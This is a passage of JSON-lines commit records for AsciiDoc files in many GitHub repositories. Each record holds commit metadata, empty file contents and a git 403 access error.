2016-02-20-Toy-Story-Midway-Mania-closing-March-15-Third-track-opening-this-summer.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-20-Toy-Story-Midway-Mania-closing-March-15-Third-track-opening-this-summer.adoc","new_file":"_posts\/2016-02-20-Toy-Story-Midway-Mania-closing-March-15-Third-track-opening-this-summer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac78949d209f8b25e2737bace2ca185596ee3e52","subject":"Update 2016-06-09-i-Phone-A-P-Pin-Philippines.adoc","message":"Update 
2016-06-09-i-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-i-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-i-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f810ac9722f4d3e28d3fe997833e7e07011ca839","subject":"y2b create post This Is Probably A Bad Idea...","message":"y2b create post This Is Probably A Bad Idea...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-23-This-Is-Probably-A-Bad-Idea.adoc","new_file":"_posts\/2017-02-23-This-Is-Probably-A-Bad-Idea.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7f4ab6570f5d95b3e6b9035f3903788c4edc921","subject":"0.8.2 release announcement","message":"0.8.2 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2018-08-30-debezium-0-8-2-final-released.adoc","new_file":"blog\/2018-08-30-debezium-0-8-2-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f7b9ce7dfd9d26d8bc96e2d646dc5d39daf228ad","subject":"Adds information to reference links.","message":"Adds information to reference links.\n","repos":"cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp","old_file":"ccma-quality-control\/Docs\/setup\/V3.6.0.0\/setup\/src\/docs\/asciidoc\/blocks\/references.adoc","new_file":"ccma-quality-control\/Docs\/setup\/V3.6.0.0\/setup\/src\/docs\/asciidoc\/blocks\/references.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortizqgithub\/csoftz-rp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b545e190e705b3cca7a43f9027a4251a7e1856f3","subject":"Delete the file at '3-3-2017-Matt-Does-Info-Sec.adoc'","message":"Delete the file at '3-3-2017-Matt-Does-Info-Sec.adoc'","repos":"mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io","old_file":"3-3-2017-Matt-Does-Info-Sec.adoc","new_file":"3-3-2017-Matt-Does-Info-Sec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mattdoesinfosec\/mattdoesinfosec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de1de623fe5402ae2f50f754a1c5834e5ffb72fc","subject":"Update 2016-03-19-Introduction-au-fonctionnement-de-Bitcoin-et-a-la-Blockchain.adoc","message":"Update 
2016-03-19-Introduction-au-fonctionnement-de-Bitcoin-et-a-la-Blockchain.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Introduction-au-fonctionnement-de-Bitcoin-et-a-la-Blockchain.adoc","new_file":"_posts\/2016-03-19-Introduction-au-fonctionnement-de-Bitcoin-et-a-la-Blockchain.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4704b567f0fc71edae165ed2c6a98d6b1d105d1","subject":"Update 2017-11-12-Sili-Play.adoc","message":"Update 2017-11-12-Sili-Play.adoc","repos":"kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io","old_file":"_posts\/2017-11-12-Sili-Play.adoc","new_file":"_posts\/2017-11-12-Sili-Play.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kzmenet\/kzmenet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2687f478e149ab4f8ad8e9c60c3c483ab2135b5","subject":"y2b create post 3 Unique Gadgets You Wouldn't Expect To Exist","message":"y2b create post 3 Unique Gadgets You Wouldn't Expect To Exist","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-23-3-Unique-Gadgets-You-Wouldnt-Expect-To-Exist.adoc","new_file":"_posts\/2018-02-23-3-Unique-Gadgets-You-Wouldnt-Expect-To-Exist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dba44167574855e88ff12074c8134b4e2e1a1cd","subject":"[docs] - Impala doc - partitioning required","message":"[docs] - Impala doc - partitioning required\n\nIt seems a blurb in the impala page got missed when partitioning\nbecame required on table create. 
Updated verbiage without removing\nreference links.\n\nChange-Id: I022b49c4e0b17031b9f14648ef0216ba0094b92b\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4595\nTested-by: Kudu Jenkins\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"442ff0307c30f8a82efd5c5306491d7a28f676fe","subject":"Update 2015-05-14-bla.adoc","message":"Update 2015-05-14-bla.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-bla.adoc","new_file":"_posts\/2015-05-14-bla.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"332f4acc2cd030e98ec9c1f96f06a836a63695cb","subject":"Update 2016-02-10-Bae.adoc","message":"Update 2016-02-10-Bae.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-02-10-Bae.adoc","new_file":"_posts\/2016-02-10-Bae.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"803e8c54e4c35077c043c6af4dd4b1b6320177f7","subject":"Updated doc\/Z-PLUGINS.adoc","message":"Updated doc\/Z-PLUGINS.adoc\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"doc\/Z-PLUGINS.adoc","new_file":"doc\/Z-PLUGINS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c2cc00524f17df456c14b4d1a7b94552e62711e","subject":"Publish asfgsdfg-markdown-test-2.adoc","message":"Publish asfgsdfg-markdown-test-2.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"asfgsdfg-markdown-test-2.adoc","new_file":"asfgsdfg-markdown-test-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"915d51b1200ef7a2298cd9eb086f1f70c86d47c2","subject":"formatting section titles","message":"formatting 
section titles","repos":"RestComm\/documentation,RestComm\/documentation","old_file":"website\/src\/main\/asciidoc\/restcommone_cloud\/Quick Start Guide_RestcommONE Cloud.adoc","new_file":"website\/src\/main\/asciidoc\/restcommone_cloud\/Quick Start Guide_RestcommONE Cloud.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RestComm\/documentation.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"e42c2da02b05e899f07c246bf7e40bb058f5bbe9","subject":"Update 2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","message":"Update 2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","new_file":"_posts\/2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c36bb222fbc25ddbe303f27661b01efc366d148c","subject":"Fix #1100 (#1101)","message":"Fix #1100 (#1101)\n\n* Fix #1100\r\n\r\nadd systemProperties.adoc\r\n\r\n* Fix #1100\r\n\r\nedit phrasing\r\n\r\n* Fix #1100\r\n\r\nedit getBoolean","repos":"OpenHFT\/Chronicle-Queue,OpenHFT\/Chronicle-Queue","old_file":"systemProperties.adoc","new_file":"systemProperties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Queue.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f754c96a7bd3d9ea25c119ef05edaf1d7b6c46f4","subject":"Update 2017-12-08-Episode-120-Extra-terrestrial-Radio.adoc","message":"Update 2017-12-08-Episode-120-Extra-terrestrial-Radio.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-12-08-Episode-120-Extra-terrestrial-Radio.adoc","new_file":"_posts\/2017-12-08-Episode-120-Extra-terrestrial-Radio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d66de3f6669fee0e4d5b2720e71057070e815b5","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"329975e921c3a6be08d6223615d641f6f8c159ed","subject":"Update 2017-08-08-adjmotion.adoc","message":"Update 
2017-08-08-adjmotion.adoc","repos":"adjiebpratama\/press,adjiebpratama\/press,adjiebpratama\/press,adjiebpratama\/press","old_file":"_posts\/2017-08-08-adjmotion.adoc","new_file":"_posts\/2017-08-08-adjmotion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adjiebpratama\/press.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"571d2ea09dbda95c51e03b46afc2f7e39963cad9","subject":"Update 2015-06-16-Role-uzivatelu.adoc","message":"Update 2015-06-16-Role-uzivatelu.adoc","repos":"silesnet\/silesnet.github.io,silesnet\/silesnet.github.io,silesnet\/silesnet.github.io","old_file":"_posts\/2015-06-16-Role-uzivatelu.adoc","new_file":"_posts\/2015-06-16-Role-uzivatelu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/silesnet\/silesnet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89d08a01860901ce2532e26f341ba9997ebef8ef","subject":"Update 2016-05-06-Welcome-Pepper.adoc","message":"Update 2016-05-06-Welcome-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"281c8489b468fef6edba1ca544582c4290001bda","subject":"Update 2017-03-22-El-primer-post.adoc","message":"Update 2017-03-22-El-primer-post.adoc","repos":"thefreequest\/thefreequest.github.io,thefreequest\/thefreequest.github.io,thefreequest\/thefreequest.github.io,thefreequest\/thefreequest.github.io","old_file":"_posts\/2017-03-22-El-primer-post.adoc","new_file":"_posts\/2017-03-22-El-primer-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thefreequest\/thefreequest.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0110a52877458b8812a548dcf643c69ec29ce78","subject":"2016-07-18-moretrees.adoc","message":"2016-07-18-moretrees.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-18-moretrees.adoc","new_file":"_posts\/2016-07-18-moretrees.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"287b45c6d2d3262c9c9317c80478c4c1b73f6502","subject":"Update 2016-10-11-Date-Test.adoc","message":"Update 2016-10-11-Date-Test.adoc","repos":"pallewela\/pallewela.github.io,pallewela\/pallewela.github.io,pallewela\/pallewela.github.io,pallewela\/pallewela.github.io","old_file":"_posts\/2016-10-11-Date-Test.adoc","new_file":"_posts\/2016-10-11-Date-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pallewela\/pallewela.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"210c191528565250a91793d97ac844899ad73688","subject":"Add design docs around XA caches","message":"Add design docs around XA caches\n","repos":"rkavanap\/ehcache3,ljacomet\/ehcache3,AbfrmBlr\/ehcache3,GaryWKeim\/ehcache3,albinsuresh\/ehcache3,GaryWKeim\/ehcache3,ehcache\/ehcache3,cschanck\/ehcache3,ehcache\/ehcache3,aurbroszniowski\/ehcache3,chrisdennis\/ehcache3,aurbroszniowski\/ehcache3,rkavanap\/ehcache3,alexsnaps\/ehcache3,jhouserizer\/ehcache3,henri-tremblay\/ehcache3,lorban\/ehcache3,cschanck\/ehcache3,chrisdennis\/ehcache3,albinsuresh\/ehcache3,cljohnso\/ehcache3,jhouserizer\/ehcache3,ljacomet\/ehcache3,lorban\/ehcache3,AbfrmBlr\/ehcache3,cljohnso\/ehcache3","old_file":"module.xa.asciidoc","new_file":"module.xa.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jhouserizer\/ehcache3.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"99ecb560bb58434903b32ac8bf110b51ef111f05","subject":"Document rule support in M3 release notes","message":"Document rule support in M3 release notes\n\n#433\n","repos":"sbrannen\/junit-lambda,junit-team\/junit-lambda","old_file":"documentation\/src\/docs\/asciidoc\/release-notes-5.0.0-M3.adoc","new_file":"documentation\/src\/docs\/asciidoc\/release-notes-5.0.0-M3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sbrannen\/junit-lambda.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"714856f17bc0c0b9644128f54ce022f78832cbe3","subject":"Update 2016-03-07-Demo.adoc","message":"Update 2016-03-07-Demo.adoc","repos":"LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io","old_file":"_posts\/2016-03-07-Demo.adoc","new_file":"_posts\/2016-03-07-Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LihuaWu\/lihuawu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22a4a8d4edf0d62a728b009a734965aa51885ba7","subject":"Update 2013-11-08-Nantes-JUG-2013-11-04-Amelioration-de-la-qualite-du-code-par-restriction-du-langage.adoc","message":"Update 2013-11-08-Nantes-JUG-2013-11-04-Amelioration-de-la-qualite-du-code-par-restriction-du-langage.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2013-11-08-Nantes-JUG-2013-11-04-Amelioration-de-la-qualite-du-code-par-restriction-du-langage.adoc","new_file":"_posts\/2013-11-08-Nantes-JUG-2013-11-04-Amelioration-de-la-qualite-du-code-par-restriction-du-langage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25c9eeb095de4cb56244585e6c852998a329c9ef","subject":"Update 2017-04-04-preventing-failing-TFS-builds-from-entering-the-continuous-delivery-pipeline-TFS-2013.adoc","message":"Update 
2017-04-04-preventing-failing-TFS-builds-from-entering-the-continuous-delivery-pipeline-TFS-2013.adoc","repos":"dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io","old_file":"_posts\/2017-04-04-preventing-failing-TFS-builds-from-entering-the-continuous-delivery-pipeline-TFS-2013.adoc","new_file":"_posts\/2017-04-04-preventing-failing-TFS-builds-from-entering-the-continuous-delivery-pipeline-TFS-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dannylane\/dannylane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f0cbe18f3012a42e751a925623117c3e9fe9285","subject":"Update 2018-02-13-Q-R-code-the-U-R-L-of-the-Web-site-currently-displayed-on-React-based-Chrome-extension.adoc","message":"Update 2018-02-13-Q-R-code-the-U-R-L-of-the-Web-site-currently-displayed-on-React-based-Chrome-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-13-Q-R-code-the-U-R-L-of-the-Web-site-currently-displayed-on-React-based-Chrome-extension.adoc","new_file":"_posts\/2018-02-13-Q-R-code-the-U-R-L-of-the-Web-site-currently-displayed-on-React-based-Chrome-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d22fd58cfa52b92c4e77ff4ae89a75544b10378","subject":"Deleted _posts\/2016-03-18-A-Breakdown-of-the-Top-Four-Teams.adoc","message":"Deleted _posts\/2016-03-18-A-Breakdown-of-the-Top-Four-Teams.adoc","repos":"mrtrombley\/blog,mrtrombley\/blog,mrtrombley\/blog,mrtrombley\/blog","old_file":"_posts\/2016-03-18-A-Breakdown-of-the-Top-Four-Teams.adoc","new_file":"_posts\/2016-03-18-A-Breakdown-of-the-Top-Four-Teams.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrtrombley\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc1d70c313a17d20fc65f962e7186cdd26d50c26","subject":"Renamed '_posts\/2017-10-20-Desarrolla-tus-propios-hacks-para-videojuegos.adoc' to '_posts\/2017-10-20-Desarrolla-hacks-para-videojuegos.adoc'","message":"Renamed '_posts\/2017-10-20-Desarrolla-tus-propios-hacks-para-videojuegos.adoc' to '_posts\/2017-10-20-Desarrolla-hacks-para-videojuegos.adoc'","repos":"chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io","old_file":"_posts\/2017-10-20-Desarrolla-hacks-para-videojuegos.adoc","new_file":"_posts\/2017-10-20-Desarrolla-hacks-para-videojuegos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chrizco\/chrizco.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb8394078af6f6df2edfbaf05e9fcaefe5ef000b","subject":"Contributing guide updated.","message":"Contributing guide updated.\n","repos":"iyzico\/boot-mon,iyzico\/boot-mon","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iyzico\/boot-mon.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"79d7b61527bd55400ae5719475b4fec5c6a77b27","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86cdfabd5c394014686c4c13ec526df6aca93b0b","subject":"Fix typo in anchor in SettingAndReadingCookies.asciidoc (#10047)","message":"Fix typo in anchor in SettingAndReadingCookies.asciidoc (#10047)\n\n","repos":"Darsstar\/framework,mstahv\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework,Darsstar\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,asashour\/framework","old_file":"documentation\/articles\/SettingAndReadingCookies.asciidoc","new_file":"documentation\/articles\/SettingAndReadingCookies.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"73d050f346500d935ae03f915909abe7cac76ead","subject":"MMLC-397: Doc the doc process.","message":"MMLC-397: Doc the doc process.\n","repos":"jbrugge\/mmlc-api,jbrugge\/mmlc-api","old_file":"doc\/README.adoc","new_file":"doc\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrugge\/mmlc-api.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"f1ec298498847a5114fe180d13e6de1116250246","subject":"Create READEM.adoc","message":"Create READEM.adoc","repos":"OpenHFT\/Chronicle-Core","old_file":"checked-exceptions\/READEM.adoc","new_file":"checked-exceptions\/READEM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"913075f98b36a8930488a36da145fb887c410988","subject":"added release notes section for capturing and video tutorial","message":"added release notes section for capturing and video tutorial\n\nSigned-off-by: imarom <4fa0e965a175bd1cef6459ed7c388bf7ff953a09@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5b4f3aefc5a4a3e15121b45e8f2b66a0b1ddc738","subject":"Update Asciidoctor.adoc","message":"Update Asciidoctor.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Asciidoctor.adoc","new_file":"Linux\/Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a10bedfa963da8e4b06e8dfea13359df0a2e83c4","subject":"[DOCS] Update index docs to match changes in IndexResponse class","message":"[DOCS] Update index docs to match changes in IndexResponse class\n\nIndexResponse.id() -> IndexResponse.getId()\n","repos":"sarwarbhuiyan\/elasticsearch,sscarduzio\/elasticsearch,kubum\/elasticsearch,lightslife\/elasticsearch,likaiwalkman\/elasticsearch,kaneshin\/elasticsearch,Shekharrajak\/elasticsearch,sauravmondallive\/elasticsearch,C-Bish\/elasticsearch,ulkas\/elasticsearch,kingaj\/elasticsearch,Charlesdong\/elasticsearch,ckclark\/elasticsearch,artnowo\/elasticsearch,umeshdangat\/elasticsearch,NBSW\/elasticsearch,TonyChai24\/ESSource,ckclark\/elasticsearch,achow\/elasticsearch,fforbeck\/elasticsearch,i-am-Nathan\/elasticsearch,dylan8902\/elasticsearch,MjAbuz\/elasticsearch,janmejay\/elasticsearch,khiraiwa\/elasticsearch,chirilo\/elasticsearch,gingerwizard\/elasticsearch,kubum\/elasticsearch,18098924759\/elasticsearch,hafkensite\/elasticsearch,sc0ttkclark\/elasticsearch,hydro2k\/elasticsearch,mnylen\/elasticsearch,jw0201\/elastic,mrorii\/elasticsearch,jsgao0\/elasticsearch,humandb\/elasticsearch,golubev\/elasticsearch,hechunwen\/elasticsearch,mgalushka\/elasticsearch,abhijitiitr\/es,GlenRSmith\/elasticsearch,humandb\/elasticsearch,Charlesdong\/elasticsearch,pablocastro\/elasticsearch,apepper\/elasticsearch,abhijitiitr\/es,wayeast\/elasticsearch,iacdingping\/elasticsearch,nrkkalyan\/elasticsearch,njlawton\/elasticsearch,masterweb121\/elasticsearch,adrianbk\/elasticsearch,koxa29\/elasticsearch,fooljohnny\/elasticsearch,rento19962\/elasticsearch,JervyShi\/elasticsearch,palecur\/elasticsearch,awislowsk